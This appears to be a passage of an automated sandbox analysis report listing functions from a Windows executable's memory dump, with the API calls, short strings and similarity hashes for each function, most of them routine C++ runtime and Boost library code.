Instruction ID: 6cc51797dc93b3519a544e1ec05f9a053a762e6795f56af9aefd895cec0c021b
Opcode Fuzzy Hash: e7ec8c1aeff8aea54c0622960873d249bf79ad0e652b139f01fc3f524725f57b
Instruction Fuzzy Hash: 93117C71801A48EBC711DBA9C444ADEFBF8FF18314F00426FE55293A91DBB4BA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004B1184, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B1189

Part of subcall function 004B4B4E: __EH_prolog.LIBCMT ref: 004B4B53

Part of subcall function 004B4BAA: __EH_prolog.LIBCMT ref: 004B4BAF

Part of subcall function 004B4FA0: __EH_prolog.LIBCMT ref: 004B4FA5
Part of subcall function 004B4FA0: new.LIBCMT ref: 004B4FF1

Part of subcall function 004B503A: __EH_prolog.LIBCMT ref: 004B503F
Part of subcall function 004B503A: __CxxThrowException@8.LIBVCRUNTIME ref: 004B50A1

Strings

No such node, xrefs: 004B11B4
class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha, xrefs: 004B11E7

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Exception@8Throw
String ID: No such node$class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_string<cha
API String ID: 1007369359-3630618227
Opcode ID: fd60f6f8783ba9dd7f2bffeb86d7ba1d4d224aea612f58cdbe6a01d4de8ea5f4
Instruction ID: 9cc27f8e975c2abf3806b492ea64522396a34f7934f704a0f63302e24a22d674
Opcode Fuzzy Hash: fd60f6f8783ba9dd7f2bffeb86d7ba1d4d224aea612f58cdbe6a01d4de8ea5f4
Instruction Fuzzy Hash: 4511CE31D012199BCF10EFA8C916BEDBBB4EF04314F10411AE6016B282DBB85B05CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00576D95, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00576D9A

Part of subcall function 005795C0: __EH_prolog.LIBCMT ref: 005795C5

Part of subcall function 00575BCD: __EH_prolog.LIBCMT ref: 00575BD2

_strlen.LIBCMT ref: 00576DEA

Strings

8nW, xrefs: 00576DCA

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: 8nW
API String ID: 1490583215-3678990148
Opcode ID: ffd4a3557ac63b3e5b3d12016631cb2498e3b012ed64ddd7264892b3a9d8037d
Instruction ID: 587648060941c9228cce58899d5a74ac498c95b054a415b06a8918cc77285a0e
Opcode Fuzzy Hash: ffd4a3557ac63b3e5b3d12016631cb2498e3b012ed64ddd7264892b3a9d8037d
Instruction Fuzzy Hash: D50124B19006459EDB24DB69A8057AEFFE8EF82320F00876FE46593292D7B81E00D751

Uniqueness

Uniqueness Score: -1.00%

Function 00414F2A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 00414F51
GetLastError.KERNEL32 ref: 00414F5B

Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F

Strings

pqcs, xrefs: 00414F76

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CompletionErrorH_prologLastPostQueuedStatus
String ID: pqcs
API String ID: 1288862127-2559862021
Opcode ID: 62289c2a887ff509f8b4b6feebd40a0b0ec8652ac821b74d8e0d5ea0993a9edb
Instruction ID: 9a0a4618d32c31c4ca22fcb0b4eafbf0e41916f42df2d488f0aae1e67509a8b1
Opcode Fuzzy Hash: 62289c2a887ff509f8b4b6feebd40a0b0ec8652ac821b74d8e0d5ea0993a9edb
Instruction Fuzzy Hash: D8F08171A00128AF9B219B6588009ABBBADEE8075875080AAEC049B211DA74CD4787E5

Uniqueness

Uniqueness Score: -1.00%

Function 00412603, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412608

Part of subcall function 0041267E: __EH_prolog.LIBCMT ref: 00412683

Part of subcall function 00410E24: __EH_prolog.LIBCMT ref: 00410E29

Strings

6A, xrefs: 0041265A
06A, xrefs: 00412653

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 6A$06A
API String ID: 3519838083-223357171
Opcode ID: f4c3e68e4bc28e1f1f5753c539ab613bd7e891ffd08312e5e4756ce1d1509342
Instruction ID: f4364291f978b96d95e8ab4b4c58549ffb775d8411f43ab9772b0b80358d3521
Opcode Fuzzy Hash: f4c3e68e4bc28e1f1f5753c539ab613bd7e891ffd08312e5e4756ce1d1509342
Instruction Fuzzy Hash: 2A01D4B6501608EAC714DF5CDA006EABFFAFB86B50F10865EE4558B641DBB46A08CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00588B1B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00588B22
new.LIBCMT ref: 00588B39

Strings

TxX, xrefs: 00588B62

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog3
String ID: TxX
API String ID: 431132790-379745606
Opcode ID: 689e7e254db3aca9115e9afcdb08b51b46fb092e3c1139756f01da526606b326
Instruction ID: e932cd90f65f572652c57038d0fb4547ca75f9f84a4485dbbce2738842243cbf
Opcode Fuzzy Hash: 689e7e254db3aca9115e9afcdb08b51b46fb092e3c1139756f01da526606b326
Instruction Fuzzy Hash: 0601D6B1900712CBDB20FF94D45676E7BA1FF40761FA5062EE8517B181CFB469008790

Uniqueness

Uniqueness Score: -1.00%

Function 00588B8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00588B96
new.LIBCMT ref: 00588BAD

Strings

vxX, xrefs: 00588BD6

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog3
String ID: vxX
API String ID: 431132790-762046408
Opcode ID: 3639303eccabd03e77228c65733224ab5f6944a02a68d5981ec817b850938b68
Instruction ID: 304df3ac81e099f7acae7f8c403a4c5f923bf45c6520c41da2ae06778c3ceb5d
Opcode Fuzzy Hash: 3639303eccabd03e77228c65733224ab5f6944a02a68d5981ec817b850938b68
Instruction Fuzzy Hash: A201A2B1900312CBDB24FF94D4567AE7BA1FF50716FA1051EA8827B181CFB459418784

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED61, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041ED66
new.LIBCMT ref: 0041ED7C

Strings

0A, xrefs: 0041ED9D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 0A
API String ID: 3519838083-187954893
Opcode ID: 081576209a9c57e4d9c2b992600b254f77e2010209fbc48a5611ec0d19550154
Instruction ID: 1205f1b611dd8bb5a84b9eeda5d22fa35e1725b24406dc39a0c12df70a1429ab
Opcode Fuzzy Hash: 081576209a9c57e4d9c2b992600b254f77e2010209fbc48a5611ec0d19550154
Instruction Fuzzy Hash: B1017CB290234AEEC764DFA9854169AFFF5FF15310F10867EE09993641D3B05A00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00412A6E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412A73
new.LIBCMT ref: 00412A86

Strings

63A, xrefs: 00412AA7

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 63A
API String ID: 3519838083-706171910
Opcode ID: cf93a89df8cc1614a4b55885b72047a4b4a4e31fe59863db90c130c1885feb11
Instruction ID: 4d3f0011076075110644a449004c8b57a75cd4cfa51f76ef3dbae39df9de59a1
Opcode Fuzzy Hash: cf93a89df8cc1614a4b55885b72047a4b4a4e31fe59863db90c130c1885feb11
Instruction Fuzzy Hash: 3E019AB1901348EEC720DF99C50579AFFE6FB81321F20826EE484A7281C3B41A00DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004F4C91, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004F4C96

Part of subcall function 0040F6F5: __EH_prolog.LIBCMT ref: 0040F6FA
Part of subcall function 0040F6F5: GetProcessHeap.KERNEL32(007A29C4,?,004F4CBE,?,4s,?,?,004F508D,?,?,00403520), ref: 0040F717

Strings

MO, xrefs: 004F4CA4
4s, xrefs: 004F4C9D, 004F4C9F

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$HeapProcess
String ID: MO$4s
API String ID: 2845616704-1959134711
Opcode ID: e77d5ff1307ee3a604e189cca595570f67578b3cbff8e24ed796561535490fbd
Instruction ID: dbdc0edb21ee75685d1cf78b0f74f817e5f646d255c02b152c54bcf46313bc55
Opcode Fuzzy Hash: e77d5ff1307ee3a604e189cca595570f67578b3cbff8e24ed796561535490fbd
Instruction Fuzzy Hash: 2601B1B29222158AC354CF5DA80195BB7A4FFD6B10F00C22EE014B3272D77829028B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00412F5C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412F61

Strings

a0A, xrefs: 00412FA1
5A, xrefs: 00412FB1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: a0A$5A
API String ID: 3519838083-3613670376
Opcode ID: e8c153ac05fb0abf176b655d90569e05d8d2991294badc8d9fe4da1b69cf7429
Instruction ID: 74fbbeb34ab73e4fc6f72e5c78d6e4a9b63b2581873420e1e30d010f3b3e697a
Opcode Fuzzy Hash: e8c153ac05fb0abf176b655d90569e05d8d2991294badc8d9fe4da1b69cf7429
Instruction Fuzzy Hash: 2F014CB1900708DFD724CF98C5487AABBF1FB08359F10865DE49A9B641C3B4DA44CF94

Uniqueness

Uniqueness Score: -1.00%

Function 005883FB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00588402
new.LIBCMT ref: 00588419

Strings

KwX, xrefs: 0058843D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog3
String ID: KwX
API String ID: 431132790-2252377540
Opcode ID: ede9df5162d71e286ecfbcee49a640fa95dacd51ba9ddae7882270e4a1c7c7af
Instruction ID: 2493293fc68edf8307d0f6882377ad95a2fd7bbabcc855ca5ef941653a5c689f
Opcode Fuzzy Hash: ede9df5162d71e286ecfbcee49a640fa95dacd51ba9ddae7882270e4a1c7c7af
Instruction Fuzzy Hash: DFF08C32901222CADB20FFD5D5523ADBBA1FF10724FA0461EA8817B292DFF45A448780

Uniqueness

Uniqueness Score: -1.00%

Function 00588463, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058846A
new.LIBCMT ref: 00588481

Strings

KwX, xrefs: 005884A5

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog3
String ID: KwX
API String ID: 431132790-2252377540
Opcode ID: 0791c912d909bb114e1fc37814755f164039cbc673efee8b620f17e34ce54b71
Instruction ID: 667f10d9b446ec22971da5ba9572065dd1043dcca169df38ce8f0b4ec7abdaa0
Opcode Fuzzy Hash: 0791c912d909bb114e1fc37814755f164039cbc673efee8b620f17e34ce54b71
Instruction Fuzzy Hash: 75F0AF32A013238BDB20FFD4D4523ADBBA6FF10714FA5451EA8957B292DFB45E008780

Uniqueness

Uniqueness Score: -1.00%

Function 005884CB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005884D2
new.LIBCMT ref: 005884E9

Strings

KwX, xrefs: 0058850D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog3
String ID: KwX
API String ID: 431132790-2252377540
Opcode ID: 27cafbe3003fd9ef3693e5490932cf150365ba621ba338f915197c2013b59262
Instruction ID: b27de10d5e233e54874d2d67d3efa33dc70fb71aa3dea89690f2bc477da2d9ae
Opcode Fuzzy Hash: 27cafbe3003fd9ef3693e5490932cf150365ba621ba338f915197c2013b59262
Instruction Fuzzy Hash: 56F0AF71900322DBDB21FF94D5523BDBBA2FF14710FA1021EA89177281EFB46E418780

Uniqueness

Uniqueness Score: -1.00%

Function 00588533, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058853A
new.LIBCMT ref: 00588551

Strings

KwX, xrefs: 00588575

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog3
String ID: KwX
API String ID: 431132790-2252377540
Opcode ID: d9f7f8fc42195fcb97ead386d520b8639126ec59907194741c59b0d2c95ab83e
Instruction ID: 8f8e434a96acb005543f2bde57bd38342d4406e2b9b2254bc0bb5f341ac7eaf0
Opcode Fuzzy Hash: d9f7f8fc42195fcb97ead386d520b8639126ec59907194741c59b0d2c95ab83e
Instruction Fuzzy Hash: 58F0A4719403229BDB20FF94D4523ADBBA1FF14710FA5451EA96577181CFB45E008BC0

Uniqueness

Uniqueness Score: -1.00%

Function 005887AD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005887B4
new.LIBCMT ref: 005887CB

Strings

KwX, xrefs: 005887EF

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog3
String ID: KwX
API String ID: 431132790-2252377540
Opcode ID: 883ea40c1275f337d1831aa4d9c1cc4527090da2f621a27c6291ef1684baea80
Instruction ID: c816c453889baebd798c0d188bad85b73d6c1bd697daecc73854785cdaa06c26
Opcode Fuzzy Hash: 883ea40c1275f337d1831aa4d9c1cc4527090da2f621a27c6291ef1684baea80
Instruction Fuzzy Hash: 7EF0AF719003228BDB20FF98D4427ADBBA2FF10710FE1462EA991B7182DFB45A01CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0058887D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00588884
new.LIBCMT ref: 0058889B

Strings

KwX, xrefs: 005888BF

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog3
String ID: KwX
API String ID: 431132790-2252377540
Opcode ID: e9791b097cc67749a9b465ac70b91a6e0426e73bf03f71ec33f41e39acb71b29
Instruction ID: 0399cbfa33d010b7fa9ab10653fb90f1a1e68c0f3e970e513ef3794a6c2c296b
Opcode Fuzzy Hash: e9791b097cc67749a9b465ac70b91a6e0426e73bf03f71ec33f41e39acb71b29
Instruction Fuzzy Hash: 81F081719002228AD760BF95D4413BEBBA2FF10750FE0491EA95177286DFB45E018B84

Uniqueness

Uniqueness Score: -1.00%

Function 00588815, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058881C
new.LIBCMT ref: 00588833

Strings

KwX, xrefs: 00588857

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog3
String ID: KwX
API String ID: 431132790-2252377540
Opcode ID: 64160bb4d50af1475aa6a7de3b00bafc445e8310aafd977cf05b74791a2d0748
Instruction ID: 18ce4793a3133c9ad5439b04be71690b705f7afeb36922af80ec8387b6386aa7
Opcode Fuzzy Hash: 64160bb4d50af1475aa6a7de3b00bafc445e8310aafd977cf05b74791a2d0748
Instruction Fuzzy Hash: CFF08C719406228ADB60FFD4D4463ADBBA1FF10B10FE10A2EA88077181DFB49E408B84

Uniqueness

Uniqueness Score: -1.00%

Function 005888E5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005888EC
new.LIBCMT ref: 00588903

Strings

KwX, xrefs: 00588927

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog3
String ID: KwX
API String ID: 431132790-2252377540
Opcode ID: 94acb57d2e8265ba5300e8613ee23ce3d3dafb0f6759aa8159e3a367d3a19198
Instruction ID: 496049f06e3927affc9548a1e932807af7bdfce1de313a27f7a8782c85837d8b
Opcode Fuzzy Hash: 94acb57d2e8265ba5300e8613ee23ce3d3dafb0f6759aa8159e3a367d3a19198
Instruction Fuzzy Hash: 1AF0AF729413228BDB60FF94D4423BDBBA2FF14B64FA1022EE98477281CFB45A40C785

Uniqueness

Uniqueness Score: -1.00%

Function 00582EF6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00582EFD
Concurrency::critical_section::critical_section.LIBCONCRT ref: 00582F32

Strings

~/X, xrefs: 00582F29

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Concurrency::critical_section::critical_sectionH_prolog3
String ID: ~/X
API String ID: 221928310-3598876131
Opcode ID: 01dc7ca36c9af132488cd6549aaafe1517b30a06729ffdfcfab98c78d5166254
Instruction ID: 4a58cd136fa69847c5614ee1920342e576b9da8fa92b96101e1748f9aea83a6d
Opcode Fuzzy Hash: 01dc7ca36c9af132488cd6549aaafe1517b30a06729ffdfcfab98c78d5166254
Instruction Fuzzy Hash: E5F03C702121019BEB18FF51C89BA393FB2BF40309F58441DEE06EA641DB74D841DB05

Uniqueness

Uniqueness Score: -1.00%

Function 0041D78C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0041D7B0

Part of subcall function 0040F323: ___std_exception_copy.LIBVCRUNTIME ref: 0040F341

__ExceptionPtrCopy.LIBCPMT ref: 0041D7C7

Part of subcall function 00582D26: _Reset.LIBCPMT ref: 00582D3A

Strings

)@A, xrefs: 0041D7BF

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CopyExceptionReset___std_exception_copystd::exception::exception
String ID: )@A
API String ID: 3160724110-964663934
Opcode ID: ceda06db20240489a6e48e70e704e601f8805f04c5b151a16a6aede31ed5b633
Instruction ID: 8f391f37537dd4bc763ec2c55056d101bb4af1d0d2a25f2f44feb554a4e6689d
Opcode Fuzzy Hash: ceda06db20240489a6e48e70e704e601f8805f04c5b151a16a6aede31ed5b633
Instruction Fuzzy Hash: 13F01D72515649ABC714DF49D802BAAFBACEB45730F10422FE82193A80DBB969008B95

Uniqueness

Uniqueness Score: -1.00%

Function 00582572, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00582579
__ExceptionPtr::__ExceptionPtr.LIBCMT ref: 005825C1

Part of subcall function 005826A0: EncodePointer.KERNEL32(?,?,?,00000001,?,005825C6,?), ref: 00582750

Strings

m+X, xrefs: 00582598

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception$EncodeH_prolog3PointerPtr::__
String ID: m+X
API String ID: 4003105897-2895029710
Opcode ID: 9392fe750c38a4d8bfbc62396106ad4d130a47cbc6f6cb885b36cf1f9f01c99e
Instruction ID: f12b37a3ac4dd88ebc41c038999ec7c113d9cd0f1659cfeced54df5a5d6e3699
Opcode Fuzzy Hash: 9392fe750c38a4d8bfbc62396106ad4d130a47cbc6f6cb885b36cf1f9f01c99e
Instruction Fuzzy Hash: 9EF09071A407459FDB10EF998841B9EFFF5BF84714F10442EF554AB291CBB09A048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 004265F7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004265FC

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Part of subcall function 0040F3FA: ___std_exception_destroy.LIBVCRUNTIME ref: 0040F424

Strings

dB, xrefs: 00426633
"gB, xrefs: 00426609

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateH_prolog___std_exception_destroystd::_
String ID: "gB$dB
API String ID: 517235596-1691998663
Opcode ID: 787f6023e36a12564c49fda4a7864fa55657460f04cb0b2a2efbc43910d7a158
Instruction ID: 4f396e299dbe407b87e936b6af92340d2bd918b4bac787491b714b9d5a8935da
Opcode Fuzzy Hash: 787f6023e36a12564c49fda4a7864fa55657460f04cb0b2a2efbc43910d7a158
Instruction Fuzzy Hash: D3F0CD71900244AAC724EF598801BAEBBF8EF81730F20425EE166A31C2CBB82A018755

Uniqueness

Uniqueness Score: -1.00%

Function 00410769, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00410770
GetLastError.KERNEL32 ref: 0041077F

Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F

Strings

tss, xrefs: 0041079A

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocErrorH_prologLast
String ID: tss
API String ID: 249634027-1638339373
Opcode ID: 37c532ff2c1216f657573317fc955fae18d32346f171784d35b4c882b7803e8d
Instruction ID: 7767345e25553655080e048a62f20e34ffe8b35e099c56ff0bf57211427a5901
Opcode Fuzzy Hash: 37c532ff2c1216f657573317fc955fae18d32346f171784d35b4c882b7803e8d
Instruction Fuzzy Hash: 92E02B30F00218ABC71077B968C409EBBE9DAC8234710427BE81597392DAB8498B4B95

Uniqueness

Uniqueness Score: -1.00%

Function 006AB711, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0069C82B), ref: 006AB750

Strings

GetSystemTimePreciseAsFileTime, xrefs: 006AB72C
0A, xrefs: 006AB746

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Time$FileSystem
String ID: 0A$GetSystemTimePreciseAsFileTime
API String ID: 2086374402-4002876861
Opcode ID: c7450b068648ba0887448b02ff3065442876bb8c914277648ff6f67ea5d52877
Instruction ID: 6d70eb9f46a9a64f14569db712dbd6e4f01f7c13f313c566dfc3d22a430fdfe1
Opcode Fuzzy Hash: c7450b068648ba0887448b02ff3065442876bb8c914277648ff6f67ea5d52877
Instruction Fuzzy Hash: 9FE0E571B41318A79710BF649D06D7EBB93DB49B11B404169F8096B281DFB08E109BCA

Uniqueness

Uniqueness Score: -1.00%

Function 0041280A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041280F

Part of subcall function 0041267E: __EH_prolog.LIBCMT ref: 00412683

Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4

Strings

6A, xrefs: 0041284E
06A, xrefs: 00412847

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 6A$06A
API String ID: 3519838083-223357171
Opcode ID: 7b6c715e5130c8721710a9e487e975662c75c4ea1790463ee8de8202fc14d362
Instruction ID: eca12a43316dbb3a31cd2df608725b8f5681017cfb1e8438f01c40cfb5baac28
Opcode Fuzzy Hash: 7b6c715e5130c8721710a9e487e975662c75c4ea1790463ee8de8202fc14d362
Instruction Fuzzy Hash: 1AF06DB1401209EBC704EF99D6056EDFFB6FF52354F10425EE1149B691CBB55A24CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005788C9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 005788CE

Part of subcall function 00579730: __EH_prolog.LIBCMT ref: 00579735

_strlen.LIBCMT ref: 005788F0

Strings

Portable image format (*.pbm;*.pgm;*.ppm;*.pxm;*.pnm), xrefs: 005788E4, 005788E9, 005788F7

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: Portable image format (*.pbm;*.pgm;*.ppm;*.pxm;*.pnm)
API String ID: 1490583215-1029613475
Opcode ID: fb69ea1aa904fa1b80504c525c44d4d7249f0eb676a8fdfece690de429d9b3fe
Instruction ID: 80bb32cce355ac01261c6b69d11c3c2255739fbf66f3e5c7b8534e45542ca4f9
Opcode Fuzzy Hash: fb69ea1aa904fa1b80504c525c44d4d7249f0eb676a8fdfece690de429d9b3fe
Instruction Fuzzy Hash: 6BF0A0729106449ADB24AF58D9067AEBBFCEF91721F10066FF42593692CBB42D0096A0

Uniqueness

Uniqueness Score: -1.00%

Function 00578E52, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00578E57

Part of subcall function 00579730: __EH_prolog.LIBCMT ref: 00579735

_strlen.LIBCMT ref: 00578E79

Strings

TIFF Files (*.tiff;*.tif), xrefs: 00578E6D, 00578E72, 00578E80

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: TIFF Files (*.tiff;*.tif)
API String ID: 1490583215-969518115
Opcode ID: 094ba78a1fe63a674c422feaf51403e5da3140e967ef29c034c1d59aa25ade87
Instruction ID: a0667cf50f8be4ec036636b3a3dd9cc6271612a5837f91897a9604bb1794b09c
Opcode Fuzzy Hash: 094ba78a1fe63a674c422feaf51403e5da3140e967ef29c034c1d59aa25ade87
Instruction Fuzzy Hash: 83F020729205449AD724AF5CD8067AEFBBCEF91720F10026FF011A3682C7B42D0092A0

Uniqueness

Uniqueness Score: -1.00%

Function 00582526, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058252D
__ExceptionPtr::__ExceptionPtr.LIBCMT ref: 00582563

Part of subcall function 005826A0: EncodePointer.KERNEL32(?,?,?,00000001,?,005825C6,?), ref: 00582750

Strings

m+X, xrefs: 00582547

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception$EncodeH_prolog3PointerPtr::__
String ID: m+X
API String ID: 4003105897-2895029710
Opcode ID: 913da3cebc69cc95631334cc77f5ad99483d006c37bc7e4efa03e1888d330ccb
Instruction ID: 8df42ccd2d3fdfc9fd85804b76f056dd488c732d34ba028371c2f0bb644040cc
Opcode Fuzzy Hash: 913da3cebc69cc95631334cc77f5ad99483d006c37bc7e4efa03e1888d330ccb
Instruction Fuzzy Hash: BCF08570A112169FCB50EFA8C0006AEBFF1BF09300F10846EB899EB201DB709A04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00410C7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00410C82
CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 00410C94

Part of subcall function 00410B2A: __EH_prolog.LIBCMT ref: 00410B2F

Part of subcall function 004123F5: __CxxThrowException@8.LIBVCRUNTIME ref: 0041240F

Strings

boost::thread_resource_error, xrefs: 00410C9E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$CreateEventException@8Throw
String ID: boost::thread_resource_error
API String ID: 198059956-52533987
